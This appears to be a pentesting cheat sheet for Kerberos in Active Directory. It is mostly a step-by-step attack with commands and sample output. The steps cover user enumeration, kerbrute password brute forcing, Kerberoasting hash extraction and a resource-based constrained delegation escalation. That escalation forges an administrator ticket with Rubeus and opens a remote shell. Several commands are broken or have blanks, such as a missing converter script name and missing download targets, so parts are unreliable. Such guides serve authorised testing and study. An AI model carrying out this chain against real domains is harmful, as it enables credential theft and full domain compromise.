Kerberos Pentesting

Last modified: 2023-08-26

Active Directory Privilege Escalation Windows

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.


To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode *it's recommended to add this flag otherwise we cannot confirm if the user exist or not.
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce -v --dc -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc -d example.domain usernames.txt

# Brute force user's password
kerbture bruteuser -v --dc -d example.domain passwords.txt username

Also, see AS-REP Roasting to find password hashes.

Kerberoasting Attack

Kerberoasting is a attack technique to crack passwords in Active Directory using a credential already gathered.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt

Privilege Escalation with Kerberos

First off, download two PS scripts in local machine..


Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

1. Check User's Permission and Windows Versions

Check if users are allowed to create a new computer object on the domain.

Get-DomainObject -Identity "dc=example,dc=com" -Domain

# -------------------------
# Result
ms-ds-machineaccountquota: 10

And check if the machine is at least Windows Server 2012.


# -------------------------
# Result
OSVersion: Windows Server 2022 Standard

Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.

Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity

# ------------------
# Result
name msds-allowedtoactionbehalfofotheridentity
---- ----------------------------------------
<HOSTNAME>   {1, 0, 4, 128...}

2. Create a New Computer

Now you can create a new computer object.

New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01

# ----------------------
# Result (copy the id)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103

Create a new raw security descriptor.

# Paste the objectsid which was copied in previous section.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose

3. Impersonate to Get a Ticket

Download Rubeus.exe in local machine.


Then upload it to the target machine and generate a RC4 hash.

# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /

# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4

We can request a Kerberos ticket for a new machine account while impersonating an administrator.

.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname> /ptt

# --------------
# Result (copy the output long hash at the last)

Then generate a ticket (.kirbi).

[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi

4. Make the Ticket Usable and Use It

Download “”.


Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.

python3 ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

We can use the ticket to get a shell.

impacket-wmiexec<hostname> -no-pass -k